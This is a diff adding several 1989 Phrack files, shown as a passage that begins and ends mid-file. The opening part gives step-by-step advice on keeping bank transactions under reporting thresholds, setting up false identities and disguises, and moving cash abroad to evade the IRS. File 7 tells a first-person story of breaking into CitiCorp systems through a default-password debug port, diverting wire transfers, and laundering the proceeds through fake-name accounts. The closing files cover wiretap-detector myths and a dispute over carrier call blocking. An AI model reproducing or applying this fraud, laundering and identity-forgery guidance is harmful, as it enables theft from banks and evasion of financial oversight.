+If three digits:  The first digit identifies the Federal Reserve District
+
+                  The second digit, if 1, stands for the Head Office of the
+                  Federal Reserve District; 2-5 stand for the Branch Office of
+                  the Federal Reserve District
+
+                  The third digit signifies:  0-available for immediate credit;
+                  others have deferred credit and the digits mean the
+                  following: 1-5 designates the state in which the drawee bank
+                  is located; 6-9 special collection arrangements.
+
+If four digits:   The first two digits stand for the Federal Reserve District
+                  10-12.
+
+The following digits are as above
+
+
+EXAMPLE:
+
+68-424       68-State of Virginia
+ 514        424-Arlington Trust Co., Arlington, VA
+              5-Fifth Federal Reserve District
+              1-Head Office in Richmond, Virginia
+              4-Deferred credit and the state of Virginia
+
+*NOTE -- For further your familiarity with the coding process, on checks, these
+         numbers appear at the bottom of the check according to the MICR Check
+         Coding System.  The check number, the account number, and the ABA
+         Transit Number will all be encoded in magnetic ink.  The ABA Number
+         will be enclosed in symbols like:  |: ABANUMBER |:  The grouping of
+         the ABA and Federal Reserve Codes will also usually appear at the
+         upper right-hand corner of the check.
+
+         Keep in mind that there are a great many checks involved in any
+         banking procedure, and almost any transaction evoked improperly will
+         draw attention.  Furthermore, the documents generated in a legitimate
+         wire-transfer situation are quite extensive.  Should a transaction be
+         noticed, and these documents are not available for scrutiny, again
+         attention will be drawn to the situation.
+
+                              * BANK DOCUMENTS *
+                              * WIRE  TRANSFER *
+
+                  INTERNAL                    CUSTOMER RECORD
+
+        Teller Tape & Proof Sheets         Copy of Wire Transfer Ticket
+        Wire Transfer Ticket               Cancelled Check (if used to
+        Microfilm copy of check              purchase)
+          used to purchase wire            Bank Statement (if funds came
+          transfer                           out of the account)
+        Microfilm copies of account
+          records (if fund came out
+          of existing account)
+        Cash In/Out Ticket
+        Vault Book Entry
+        Bank Security Film
+        Copy of CTR
+
+Bank transactions must be swift and precise.  Amounts should be kept under the
+$10,000 range in order not to immediately arouse suspicion.  Attacks must
+executed correctly the first time, as there will be no possibilities for a
+second chance.  Monies must be gathered rapidly and dispersed into various
+outlets to avoid additional attention.  Transfers to banking systems whose
+countries keep strict right to privacy laws, such as Panama, Switzerland,
+et.al. are not recommended as the transactions are much more involved and there
+exists a greater potential for error in international wire-transfers.
+
+The preferred method of transfer of funds would involve one or more false
+identities, complete with state approved identification or passport and social
+security cards.  Bank Security Film is kept on file, so it would be preferred
+that some semblance of disguise be implemented, ranging from hair bleaching,
+sun-tanning, makeup, false accents, facial hair, etc.  Various accounts in the
+assumed name would be opened in several cities with the minimum initial
+balance.  Within approximately two weeks, funds of no more than $7500 would be
+diverted to each account.  The funds would then be withdrawn in cash with no
+more than $5000 from each account, the balance being left in the account.  Once
+the funds have been made cash, they would then be distributed to foreign banks,
+or invested in foreign markets to avoid detection by the Internal Revenue
+Service.
+
+Conviction for Illegal Transference of Funds is not recommended.
+
+                        >--------=====END=====--------<
diff --git a/phrack29/7.txt b/phrack29/7.txt
new file mode 100644
index 0000000..90bc359
--- /dev/null
+++ b/phrack29/7.txt
@@ -0,0 +1,194 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 29, File #7 of 12
+
+                              The Legion of Doom!
+                                 EFT Division
+
+                                   Presents
+
+               HOW WE GOT RICH THROUGH ELECTRONIC FUND TRANSFERS
+
+                             (OR:  GEE!  NO, GTE!)
+
+
+     A certain number of financial institutions that reside within the
+packet-switched confines of the various X.25 networks use their connections to
+transfer funds from one account to another, one mutual fund to another, one
+stock to another, one bank to another, etc...  It is conceivable that if one
+could intercept these transactions and divert them into another account, they
+would be transferred (and could be withdrawn) before the computer error was
+noticed.  Thus, with greed in our hearts, an associate and I set forth to test
+this theory and conquer the international banking world.
+
+     We chose CitiCorp as our victim.  This multinational had two address
+prefixes of its own on Telenet (223 & 224).  Starting with those two prefixes,
+my associate and I began to sequentially try every possible address.  We
+continued through 1000 in increments of one, then A-Z, then 1000-10000 by 10's,
+and finally 10000-99999 by 100's.  Needless to say, many addresses were
+probably skipped over in our haste to find valid ones, but many we passed over
+were most likely duplicate terminals that we had already encountered.
+
+     For the next few days my associate and I went over the addresses we had
+found, comparing and exchanging information, and going back to the addresses
+that had shown 'NOT OPERATING,' 'REMOTE PROCEDURE ERROR,' and 'REJECTING.'  We
+had discovered many of the same types of systems, mostly VAX/VMS's and Primes.
+We managed to get into eight of the VAXen and then went forth on the CitiCorp
+DECNET, discovering many more.  We entered several GS1 gateways and Decservers
+and found that there were also links leading to systems belonging to other
+financial institutions such as Dai-Ichi Kangyo Bank New York and Chase
+Manhattan.  We also found hundreds of addresses to TWX machines and many
+in-house bank terminals (most of which were 'BUSY' during banking hours, and
+'NOT OPERATING' during off hours).  In fact, the only way we knew that these
+were bank terminals was that an operator happened to be idle just as I
+connected with her terminal (almost like the Whoopie Goldberg movie, "Jumpin'
+Jack Flash," not quite as glamorous ...yet.)
+
+     Many of the computers we eventually did penetrate kept alluding to the
+electronic fund transfer in scripts, files, and personal mail.  One of the
+TOPS-20 machines we found even had an account EFTMKTG.EFT, (password EFTEFT)!
+All the traces pointed to a terminal (or series of terminals) that did nothing
+but transfer funds.  We decided that this was the case and decided to
+concentrate our efforts on addresses that allowed us to CONNECT periodically
+but did not respond.  After another week of concentrated effort, we managed to
+sort through these.  Many were just terminals that had been down or
+malfunctioning, but there were five left that we still had no idea of their
+function.  My associate said that we might be able to monitor data
+transmissions on the addresses if we could get into the debug port.  With this
+idea in mind, we set out trying sub-addresses from .00 to .99 on the mystery
+addresses.  Four of the five had their debug ports at the default location
+(.99).  The fifth was located 23 away from the default.  That intrigued us, so
+we put the others aside and concentrated on the fifth.  Although its location
+was moved, a default password was still intact, and we entered surreptitiously.
+
+     The system was menu driven with several options available.  One option,
+Administrative Functions, put us into a UNIX shell with root privilege.  After
+an hour or so of nosing around, we found a directory that held the Telenet
+Debug Tools package (which I had previously thought existed solely for Prime
+computers).  Using TDT, we were able to divert all data (incoming and outgoing)
+into a file so we could later read and analyze it.  We named the file ".trans"
+and placed it in a directory named "..  ", (dot, dot, space, space) so it would
+remain hidden.  This was accomplished fairly late on a Sunday night.  After
+logging off, we opened a case of Coors Light and spent the rest of the night
+(and part of the morning!) theorizing about what we might see tomorrow night
+(and getting rather drunk).
+
+     At approximately 9:00 p.m. the following evening, we met again and logged
+onto the system to view the capture file, hoping to find something useful.  We
+didn't have to look very far!  The first transmission was just what we had been
+dreaming about all along.  The computer we were monitoring initiated by
+connecting with a similar computer at another institution, waited for a
+particular control sequence to be sent, and then transferred a long sequence of
+numbers and letters.  We captured about 170 different transactions on the first
+day and several hundred more in the following week.  After one business week,
+we removed the file and directory, killed the TDT routine, and went through the
+system removing all traces that we had been there.
+
+     We felt that we had enough to start piecing together what it all meant, so
+we uploaded our findings to the LOD HP-3000 (ARMA) in Turkey.  This way we
+could both have access to the data, but keep it off our home systems.  We
+didn't bother to tell any of the other LOD members about our doings, as most
+had retired, been busted, or were suspected of turning information over to the
+Secret Service.  Using this as a base, we analyzed the findings, sorted them,
+looked for strings being sent, etc.
+
+     We came to the conclusion that the transmissions were being sent in the
+following way:
+
+
+     XXXXXXXXXXXXTCxxxxxxxxxxxx/NNNNNNNNNNNNCnnnnnnnnnnnnAMzzzzzzz.zzOP#
+     X=Originating Bank ID
+     T=Transfer (Also could be R(ecieve), I(nquire))
+     C=Type of account (Checking--Also S(avings) I(RA) M(oney Market)
+         T(rust) W(Other wire transfer ie. Credit Transfer, etc.))
+     x=Originating Account Number
+     /=Slash to divide string
+     N=Destination Bank ID
+     C=Type of account (See above)
+     n=Destination Account Number
+     AMzzzzzzz.zz=Amount followed by dollar and cents amount
+     OP#=operator number supervising transaction
+
+     After this string of information was sent, the destination bank would then
+echo back the transaction and, in ten seconds, unless a CONTROL-X was sent,
+would send "TRANSACTION COMPLETED" followed by the Destination Bank ID.
+
+     We now needed to check out our theory about the Bank ID's, which I figured
+were the Federal Reserve number for the Bank.  Every bank in America that deals
+with the Federal Reserve System has such a number assigned to it (as do several
+European Banks).  I called up CitiBank and inquired about their Federal Reserve
+Number.  It was the number being sent by the computer.  With this information,
+we were ready to start.
+
+     I consulted an accountant friend of mine for information on Swiss or
+Bahamanian bank accounts.  He laughed and said that a $50,000 initial deposit
+was required to get a numbered account at most major Swiss banks.  I told him
+to obtain the forms necessary to start the ball rolling and I'd wire the money
+over to the bank as soon as I was told my account number.  This shook him up
+considerably, but he knew me well enough not to ask for details.  He did,
+however, remind me of his $1000 consulting fee.  A few days later he showed up
+at my townhouse with an account number, several transaction slips and
+paperwork.  Knowing that I was up to something shady, he had used one of his
+own false identities to set up the account.  He also raised his "fee" to $6500
+(which was, amazingly enough, the amount he owed on his wife's BMW).
+
+     My associate and I then flew to Oklahoma City to visit the hall of records
+to get new birth certificates.  With these, we obtained new State ID's and
+Social Security Numbers.  The next step was to set up bank accounts of our own.
+My associate took off to Houston and I went to Dallas.  We each opened new
+commercial accounts at three different banks as LOD Inc. with $1000 cash.
+
+     Early the next day, armed with one Swiss and six American accounts, we
+began our attack.  We rigged the CitiCorp computer to direct all of its data
+flow to a local Telenet node, high up in the hunt series.  Amazingly, it still
+allowed for connections from non-909/910 nodes.  We took turns sitting on the
+node, collecting the transmissions and returning the correct acknowledgments.
+By 12:30 we had $184,300 in electronic funds in "Limbo."  Next we turned off
+the data "forwarding" on the CitiCorp computer and took control of the host
+computer itself through the debug port to distribute the funds.  Using its data
+lines, we sent all the transactions, altering the intended bank destinations,
+to our Swiss account.
+
+     After I got the confirmation from the Swiss bank I immediately filled out
+six withdrawal forms and faxed them to the New York branch of the Swiss bank
+along with instructions on where the funds should be distributed.  I told the
+bank to send $7333 to each of our six accounts (this amount being small enough
+not to set off Federal alarms).  I did this for three consecutive days, leaving
+our Swiss account with $52,000.  I signed a final withdrawal slip and gave it
+to my accountant friend.
+
+     Over the next week we withdrew the $22,000 from each of our Dallas and
+Houston banks in lots of $5000 per day, leaving $1000 in each account when we
+were through.  We were now $66,000 apiece richer.
+
+     It will be interesting to see how the CitiCorp Internal Fraud Auditors and
+the Treasury Department sort this out.  There are no traces of the diversion,
+it just seems to have happened.  CitiBank has printed proof that the funds were
+sent to the correct banks, and the correct banks acknowledgment on the same
+printout.  The correct destination banks, however, have no record of the
+transaction.  There is record of CitiBank sending funds to our Swiss account,
+but only the Swiss have those records.  Since we were controlling the host when
+the transactions were sent, there were no printouts on the sending side.  Since
+we were not actually at a terminal connected to one of their line printers, no
+one should figure out to start contacting Swiss banks, and since CitiBank does
+this sort of thing daily with large European banks, they will be all twisted
+and confused by the time they find ours.  Should they even get to our bank,
+they will then have to start the long and tedious process of extracting
+information from the Swiss.  Then if they get the Swiss to cooperate, they will
+have a dead-end with the account, since it was set up under the guise of a
+non-entity.  The accounts in Dallas and Houston were also in fake names with
+fake Social Security Numbers; we even changed our appearances and handwriting
+styles at each bank.
+
+     I'm glad I'm not the one who will have the job of tracking me down, or
+even trying to muster up proof of what happened.  Now we won't have to worry
+about disposable income for awhile.  I can finish college without working and
+still live in relative luxury.  It's kind of weird having over six-hundred $100
+bills in a drawer, though.  Too bad we can't earn any interest on it!
+
+
+**  Since the events described transpired, CitiBank has made their Banking
+    Transaction Ports all refuse collect connections.  Even by connecting
+    with an NUI they now respond "<<ENTER PASSWORD>>".  C'est La Vie.
+
+                        >--------=====END=====--------<
diff --git a/phrack29/8.txt b/phrack29/8.txt
new file mode 100644
index 0000000..7b086c3
--- /dev/null
+++ b/phrack29/8.txt
@@ -0,0 +1,278 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 29, File #8 of 12
+
+                  ...........................................
+                  ||||||!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!||||||
+                  |||!!!                               !!!|||
+                  |||     The Myth and Reality About      |||
+                  |||            Eavesdropping            |||
+                  |||                                     |||
+                  |||          by Phone Phanatic          |||
+                  |||                                     |||
+                  |||...        October 8, 1989        ...|||
+                  ||||||...............................||||||
+                  !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+
+
+Most Central Office (CO) eavesdropping intercepts in a Bell Operating Company
+(BOC) CO are today performed using a modified Metallic Facility Termination
+(MFT) circuit pack which places about a 100,000 ohm isolated bridging impedance
+across the subscriber line.  Supervisory signaling is detected on the
+subscriber loop using a high-impedance electronic circuit, and the signaling is
+repeated in an isolated fashion using the A and B leads of the repeating coil
+in the MFT to "reconstruct" a CO line for the benefit of monitoring apparatus.
+
+The entire purpose of the above effort is to prevent any trouble or noise on
+the intercept line or monitoring apparatus from causing any trouble, noise or
+transmission impairment on the subject line.
+
+Some BOCs may elect to use service observing apparatus to provide the necessary
+isolation and repeated loop supervisory signaling.  Less common are locally
+engineered variations which merely use an isolation amplifier from an MFT or
+other 4-wire repeater, and which provide no repeated supervisory signaling
+(which is not all that necessary, since voice-activated recorders and DTMF
+signaling detectors can be used, and since dial pulses can be counted by
+playing a tape at slow speed).
+
+Today, the use of a "bridge lifter" retardation coil for the purpose of
+connecting an eavesdropping intercept line is virtually non-existent since they
+do not provide sufficient isolation and since they provide a fair amount of
+insertion loss without loop current on the "observing" side.  Bridge lifter
+coils are primarily intended for answering service intercept lines, and consist
+of a dual-winding inductor which passes 20 Hz ringing and whose windings easily
+saturate when DC current flows.  Bridge lifter coils are used to minimize the
+loading effect (and consequent transmission impairment) of two subscriber loops
+on one CO line.  Bridge lifter coils provide a significant insertion loss at
+voice frequencies toward the idle loop; i.e., the loop in use will have DC
+current flow, saturating the inductor, and reducing its insertion loss to
+1.0 dB or less.
+
+Despite gadget advertised in magazines like The Sharper Image, the simple truth
+of the matter is that there is NO WAY for any person using ANY type of
+apparatus at the telephone set location to ascertain whether there is a
+properly installed eavesdropping device connected across their line in the CO.
+The only way such a determination can be made is through the cooperation of the
+telephone company.
+
+For that matter, there is virtually no way for any person using any type of
+apparatus in their premises to ascertain if there is ANY type of eavesdropping
+apparatus installed ANYWHERE on their telephone line outside their premises,
+unless the eavesdropping apparatus was designed or installed in an
+exceptionally crude manner (not likely today).  Some types of eavesdropping
+apparatus may be located, but only with the full cooperation of the telephone
+company.
+
+The sole capability of these nonsense gadgets is to ascertain if an extension
+telephone is picked up during a telephone call, which is hardly a likely
+scenario for serious eavesdropping!
+
+These screw-in-the-handset gadgets work by sensing the voltage across the
+carbon transmitter circuit, and using a control to null this voltage using a
+comparator circuit.  When a person makes a telephone call, the control is
+adjusted until the light just goes out.  If an extension telephone at the
+user's end is picked up during the call, the increased current drain of a
+second telephone set will decrease the voltage across the carbon transmitter
+circuit, unbalancing the voltage comparator circuit, and thereby causing the
+LED to light.
+
+These voltage comparator "tap detectors" cannot even be left with their
+setpoint control in the same position, because the effective voltage across a
+subscriber loop will vary depending upon the nature of the call (except in the
+case of an all digital CO), and upon other conditions in the CO.
+Electromechanical and analog ESS CO's may present different characteristics to
+the telephone line, depending upon whether it is used at the time of:  An
+originated intraoffice call (calling side of intraoffice trunk), an answered
+intraoffice call (called side of intraoffice trunk), an originated tandem call
+(interoffice tandem trunk), an originated toll call (toll trunk), or an
+answered tandem/toll call (incoming tandem or toll trunk).  There is usually
+enough variation in battery feed resistance due to design and component
+tolerance changes on these different trunks to cause a variation of up to
+several volts measured at the subscriber end for a given loop and given
+telephone instrument.
+
+Even more significant are variations in CO battery voltage, which can vary
+(within "normal limits") from 48 volts to slightly over 52 volts, depending
+upon CO load conditions.  50 to 51 volts in most CO's is a typical daily
+variation.  If anyone is curious, connect an isolated voltage recorder or data
+logger to a CO loop and watch the on-hook voltage variations; in many CO's the
+resultant voltage vs 24-hour time curve will look just like the inverse of a
+busy-hour graph from a telephone traffic engineering text!
+
+In some all-digital CO apparatus, the subscriber loop signaling is performed by
+a solid-state circuit which functions as a constant-current (or
+current-limiting) device.  With such a solid-state circuit controlling loop
+current, there is no longer ANY meaningful reference to CO battery voltage;
+i.e., one cannot even use short-circuit loop current at the subscriber location
+to even estimate outside cable plant resistance.
+
+To explode this myth even further, let's do a little Ohm's Law:
+
+     1.  Assume a CO loop with battery fed from a dual-winding A-relay (or
+         line relay, ESS ferrod line scanner element, or whatever) having 200
+         ohms to CO battery and 200 ohms to ground.
+
+     2.  Assume a CO loop of 500 ohms (a pretty typical loop).
+
+     3.  Assume an eavesdropping device with a DC resistance of 100,000 ohms
+         (this is still pretty crude, but I'm being generous with my example).
+
+     4.  Using some simple Ohm's law, the presence or absence of this
+         hypothetical eavesdropping device at the SUBSCRIBER PREMISES will
+         result in a voltage change of less than 0.5 volt when measured in the
+         on-hook state.  This voltage change is much less than normal
+         variations of CO battery voltage.
+
+     5.  Using some simple Ohm's law, the presence or absence of this
+         hypothetical eavesdropping device at the CENTRAL OFFICE LOCATION will
+         result in a voltage change of less than 0.2 volt when measured in the
+         on-hook state.  This voltage change is an order of magnitude less than
+         the expected normal variation of CO battery voltage!
+
+Measuring voltage variations on a subscriber loop in an effort to detect a
+state-of-the-art eavesdropping device is meaningless, regardless of resolution
+of a voltage measuring device, since the "signal" is in effect buried in the
+"noise".
+
+Moving on to the subject of subscriber line impedance...
+
+There is simply no way for any device located on the subscriber's premises to
+obtain any MEANINGFUL information concerning the impedance characteristics of
+the subscriber loop and whether or not anything "unusual" is connected at the
+CO (or for that matter, anywhere else on the subscriber loop).  There are a
+number of reasons why this is the case, which include but are not limited to:
+
+     1.  The impedance of a typical telephone cable pair results from
+         distributed impedance elements, and not lumped elements.  Non-loaded
+         exchange area cable (22 to 26 AWG @ 0.083 uF/mile capacitance) is
+         generally considered to have a characteristic impedance of 600 ohms
+         (it actually varies, but this is a good compromise figure).  Loaded
+         exchange area cable, such as H88 loading which are 88 mH coils spaced
+         at 6 kft intervals, is generally considered to have a a characteristic
+         impedance of 900 ohms (it actually varies between 800 and 1,200 ohms,
+         but 900 ohms is generally regarded as a good compromise figure for the
+         voice frequency range of 300 to 3,000 Hz).  What this means is that a
+         bridged impedance of 100,000 ohms located in the CO on a typical
+         subscriber loop will result in an impedance change measured at the
+         SUBSCRIBER LOCATION of 0.1% or less.  That's IF you could measure the
+         impedance change at the subscriber location.
+
+     2.  As a general rule of thumb, the impedance of an exchange area
+         telephone cable pair changes ONE PERCENT for every TEN DEGREES
+         Fahrenheit temperature change.  Actual impedance changes are a
+         function of the frequency at which the impedance is measured, but the
+         above rule is pretty close for the purposes of this discussion.
+
+     3.  Moisture in the telephone cable causes dramatic changes in its
+         impedance characteristics.  While this may appear obvious in the case
+         of pulp (i.e., paper) insulated conductors, it is also characteristic
+         of polyethylene (PIC) insulated conductors.  Only gel-filled cable
+         (icky-PIC), which still represents only a small percentage of
+         installed cable plant, is relatively immune from the effects of
+         moisture.
+
+     4.  From a practical standpoint, it is extremely difficult to measure
+         impedance in the presence of the DC potential which is ALWAYS found on
+         a telephone line.  The subscriber has no means to remove the telephone
+         pair from the switching apparatus in the CO to eliminate this
+         potential.
+
+         Therefore, any attempt at impedance measurement will be subject to DC
+         current saturation error of any inductive elements found in an
+         impedance bridge.  The telephone company can, of course, isolate the
+         subscriber cable pair from the switching apparatus for the purpose of
+         taking a measurement -- but the subscriber cannot.  In addition to the
+         DC current problem, there is also the problem of impulse and other
+         types of noise pickup on a connected loop which will impress errors in
+         the impedance bridge detector circuit.  Such noise primarily results
+         from the on-hook battery feed, and is present even in ESS offices,
+         with ferrod scanner pulses being a good source of such noise.  While
+         one could possibly dial a telephone company "balance termination" test
+         line to get a quieter battery feed, this still leaves something to be
+         desired for any actual impedance measurements.
+
+     5.  Devices which connect to a telephone pair and use a 2-wire/4-wire
+         hybrid with either a white noise source or a swept oscillator on one
+         side and a frequency-selective voltmeter on the other side to make a
+         frequency vs return loss plot provide impressive, but meaningless
+         data.  Such a plot may be alleged to show "changes" in telephone line
+         impedance characteristics.  There is actual test equipment used by
+         telephone companies which functions in this manner to measure 2-wire
+         Echo Return Loss (ERL), but the ERL measurement is meaningless for
+         localization of eavesdropping devices.
+
+     6.  It is not uncommon for the routing of a subscriber line cable pair to
+         change one or more times during its lifetime due to construction and
+         modification of outside cable plant.  Outside cable plant bridge taps
+         (not of the eavesdropping variety) can come and go, along with back
+         taps in the CO to provide uninterrupted service during new cable plant
+         additions.  Not only can the "active" length of an existing cable pair
+         change by several percent due to construction, but lumped elements of
+         impedance can come and go due to temporary or permanent bridge taps.
+
+The bottom line of the above is that one cannot accurately measure the
+impedance of a telephone pair while it is connected to the CO switching
+apparatus, and even if one could, the impedance changes caused by the
+installation of an eavesdropping device will be dwarfed by changes in cable
+pair impedance caused by temperature, moisture, and cable plant construction
+unknown to the subscriber.
+
+About a year ago on a bulletin board I remember some discussions in which there
+was mention of the use of a time domain reflectometer (TDR) for localization of
+bridge taps and other anomalies.  While a TDR will provide a rather detailed
+"signature" of a cable pair, it has serious limitations which include, but are
+not limited to:
+
+     1.  A TDR, in general, cannot be operated on a cable pair upon which there
+         is a foreign potential; i.e., a TDR cannot be used on a subscriber
+         cable pair which is connected to the CO switching apparatus.
+
+     2.  A TDR contains some rather sensitive circuitry used to detect the
+         reflected pulse energy, and such circuitry is extremely susceptible to
+         noise found in twisted pair telephone cable.  A TDR is works well with
+         coaxial cable and waveguide, which are in effect shielded transmission
+         lines.  The use of a TDR with a twisted cable pair is a reasonable
+         compromise provided it is a _single_ cable pair within one shield.
+         The use of a TDR with a twisted cable pair sharing a common shield
+         with working cable pairs is an invitation to interference by virtue of
+         inductive and capacitive coupling of noise from the working pairs.
+
+     3.  Noise susceptibility issues notwithstanding, most TDR's cannot be used
+         beyond the first loading coil on a subscriber loop since the loading
+         coil inductance presents far too much reactance to the short pulses
+         transmitted by the TDR.  There are one or two TDR's on the market
+         which claim to function to beyond ONE loading coil, but their
+         sensitivity is poor.
+
+There is simply no device available to a telephone subscriber that without the
+cooperation of the telephone company which can confirm or deny the presence of
+any eavesdropping device at any point beyond the immediate premises of the
+subscriber.  I say "immediate premises of the subscriber" because one presumes
+that the subscriber has the ability to isolate the premises wiring from the
+outside cable plant, and therefore has complete inspection control over the
+premises wiring.
+
+I have used the phrase "without the cooperation of the telephone company"
+several times in this article.  No voltage, impedance or TDR data is meaningful
+without knowing the actual circuit layout of the subscriber loop in question.
+Circuit layout information includes such data as exact length and guages of
+loop sections, detailed description of loading (if present), presence and
+location of multiples and bridge taps, calculated and measured resistance of
+the loop, loop transmission loss, etc.  There is NO way that a telephone
+company is going to furnish that information to a subscriber!  Sometimes it's
+even difficult for a government agency to get this information without judicial
+intervention.
+
+Despite what I have stated in this article, you will see claims made by third
+parties as to the existence of devices which will detect the presence of
+telephone line eavesdropping beyond the subscriber's immediate premises.  With
+the exception of the trivial cases of serious DC current draw by an extension
+telephone or the detection of RF energy emitted by a transmitter, this just
+ain't so.  Companies like Communication Control Corporation (which advertises
+in various "executive" business publications) get rich by selling devices which
+claim to measure minute voltage and impedance changes on a telephone line --
+but consider those claims in view of the voltage changes due to CO battery
+variations and due to temperature changes in outside cable plant -- and you
+should get the true picture.
+
+                        >--------=====END=====--------<
diff --git a/phrack29/9.txt b/phrack29/9.txt
new file mode 100644
index 0000000..ce604de
--- /dev/null
+++ b/phrack29/9.txt
@@ -0,0 +1,367 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 29, File #9 of 12
+
+         \`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\
+         \`\                                                       \`\
+         \`\     BLOCKING OF LONG-DISTANCE CALLS... REVISITED      \`\
+         \`\                   by Jim Schmickley                   \`\
+         \`\                                                       \`\
+         \`\            Hawkeye PC, Cedar Rapids, Iowa             \`\
+         \`\                                                       \`\
+         \`\           Previosly Seen in Pirate Magazine           \`\
+         \`\                                                       \`\
+         \`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\
+
+
+This file is a continuation of "Block Of Long-Distance Calls" that was seen in
+Phrack Inc. Issue 21, file 8.  Although the material has already been released
+(perhaps on a limited basis) in Pirate Magazine, we felt the information was
+important enough to re-present (on a larger scale), especially considering it
+was an issue that we had previously detailed. -- Phrack Inc. Staff
+
+The following article begins where the previous article left off:
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                                                              November 17, 1988
+
+
+
+Customer Service
+Teleconnect
+P.O. Box 3013
+Cedar Rapids, IA  52406-9101
+
+Dear Persons:
+
+I am writing in response to my October Teleconnect bill, due November 13, for
+$120.76.  As you can see, it has not yet been paid, and I would hope to delay
+payment until we can come to some equitable table resolution of what appears to
+be a dispute.   The records should show that I have paid previous bills
+responsibly.  Hence, this is neither an attempt to delay nor avoid payment.  My
+account number is: 01-xxxx-xxxxxx.  My user phone is: 815-xxx-xxxx.  The phone
+of record (under which the account is registered) is: 815-xxx-xxxx.
+
+If possible, you might "flag" my bill so I will not begin receiving dunning
+notices until we resolve the problem.  I have several complaints.  One is the
+bill itself, the other is the service.  I feel my bill has been inflated
+because of the poor quality of the service you provide to certain areas of the
+country.  These lines are computer lines, and those over which the dispute
+occurs are 2400 baud lines.  Dropping down to 1200 baud does not help much.  As
+you can see from my bill, there are numerous repeat calls made to the same
+location within a short period of time.  The primary problems occured to the
+following locations:
+
+1. Highland, CA        714-864-4592
+2. Montgomery, AL      205-279-6549
+3. Fairbanks, AK       907-479-7215
+4. Lubbock, TX         806-794-4362
+5. Perrine, FL         305-235-1645
+6. Jacksonville, FL    904-721-1166
+7. San Marcos, TX      512-754-8182
+8. Birmingham, AL      205-979-8409
+9. N. Phoenix, AZ      602-789-9269 <-- (The Dark Side BBS by The Dictator)
+
+The problem is simply that, to these destinations, Teleconnect can simply not
+hold a line.  AT&T can.  Although some of these destinations were held for a
+few minutes, generally, I cannot depend on TC service, and have more recently
+begun using AT&T instead.  Even though it may appear from the records that I
+maintained some contact for several minutes, this time was useless, because I
+cold not complete my business, and the time was wasted.  An equitable
+resolution would be to strike these charges from my bill.
+
+I would also hope that the calls I place through AT&T to these destinations
+will be discounted, rather than pay the full cost.  I have enclosed my latest
+AT&T bill, which includes calls that I made through them because of either
+blocking or lack of quality service.  If I read it correctly, no discount was
+taken off.  Is this correct?
+
+As you can see from the above list of numbers, there is a pattern in the poor
+quality service:  The problem seems to lie in Western states and in the deep
+south.  I have no problem with the midwest or with numbers in the east.
+
+I have been told that I should call a service representative when I have
+problems.  This, however, is not an answer for several reasons.  First, I have
+no time to continue to call for service in the middle of a project.  The calls
+tend to be late at night, and time is precious.  Second, on those times I have
+called, I either could not get through, or was put on hold for an
+indeterminable time.   Fourth, judging from comments I have received in several
+calls to Teleconnect's service representatives, these seem to be problems for
+which there is no immediate solution, thus making repeated calls simply a waste
+of time.  Finally, the number of calls on which I would be required to seek
+assistance would be excessive.  The inability to hold a line does not seem to
+be an occasional anomaly, but a systematic pattern that suggests that the
+service to these areas is, indeed, inadequate.
+
+A second problem concerns the Teleconnect policy of blocking certain numbers.
+Blocking is unacceptable.  When calling a blocked number, all one receives is a
+recorded message that "this is a local call."  Although I have complained about
+this once I learned of the intentional blocking, the message remained the same.
+I was told that one number (301-843-5052) would be unblocked, and for several
+hours it was.  Then the blocking resumed.
+
+A public utility simply does not have the right to determine who its customers
+may or may not call.  This constitutes a form of censorship.  You should
+candidly tell your customers that you must approve of their calls or you will
+not place them.  You also have the obligation to provide your customers with a
+list of those numbers you will  not service so that they will not waste their
+time attempting to call.  You might also change the message that indicates a
+blocked call by saying something "we don't approve of who you're calling, and
+won't let you call."
+
+I appreciate the need to protect your customers.  However, blocking numbers is
+not appropriate.  It is not clear how blocking aids your investigation, or how
+blocking will eliminate whatever problems impelled the action.  I request the
+following:
+
+1.  Unblock the numbers currently blocked.
+2.  Provide me with a complete list of the numbers you are blocking.
+3.  End the policy of blocking.
+
+I feel Teleconnect has been less than honest with its customers, and is a bit
+precipitous in trampling on rights, even in a worthy attempt to protect them
+from  abuses of telephone cheats.   However, the poor quality of line service,
+combined with the apparrent violation of Constitutional rights, cannot be
+tolerated.  Those with whom I have spoken about this matter are polite, but the
+bottom line is that they do not respond to the problem.  I would prefer to pay
+my bill only after we resolve this.
+
+Cheerfully,
+
+(Name removed by request)
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                /*/ ST*ZMAG SPECIAL REPORT - by Jerry Cross /*/
+                    (reprinted from Vol. #28, 7 July, 1989)
+                ===============================================
+                       TELECONNECT CALL BLOCKING UPDATE
+                          Ctsy (Genesee Atari Group)
+
+Background
+~~~~~~~~~~
+At the beginning of last year one of my bbs users uploaded a file he found on
+another bbs that he thought I would be interested in.  It detailed the story of
+an Iowa bbs operator who discovered that Teleconnect, a long distance carrier,
+was blocking incoming calls to his bbs without his or the callers knowledge.
+
+As an employee of Michigan Bell I was very interested.  I could not understand
+how a company could interfere with the transmissions of telephone calls,
+something that was completely unheard of with either AT&T or Michigan Bell in
+the past.  The calls were being blocked, according to Teleconnect public
+relations officials, because large amounts of fraudulent calls were being
+placed through their system.  Rather than attempting to discover who was
+placing these calls, Teleconnect decided to take the easy (and cheap) way out
+by simply block access to the number they were calling.  But the main point was
+that a long distance company was intercepting phone calls.  I was very
+concerned.
+
+I did some investigating around the Michigan area to see what the long distance
+carriers were doing, and if they, too, were intercepting or blocking phone
+calls.  I also discovered that Teleconnect was just in the process of setting
+up shop to serve Michigan.  Remember, too, that many of the former AT&T
+customers who did not specify which long distance carrier they wanted at the
+time of the AT&T breakup were placed into a pool, and divided up by the
+competing long distance companies.  There are a number of Michigan users who
+are using certain long distance carriers not of their choice.
+
+My investigation discovered that Michigan Bell and AT&T have a solid, computer
+backed security system that makes it unnecessary for them to block calls.  MCI,
+Sprint, and a few other companies would not comment or kept passing me around
+to other departments, or refused to comment about security measures.
+
+I also discussed this with Michigan Bell Security and was informed that any
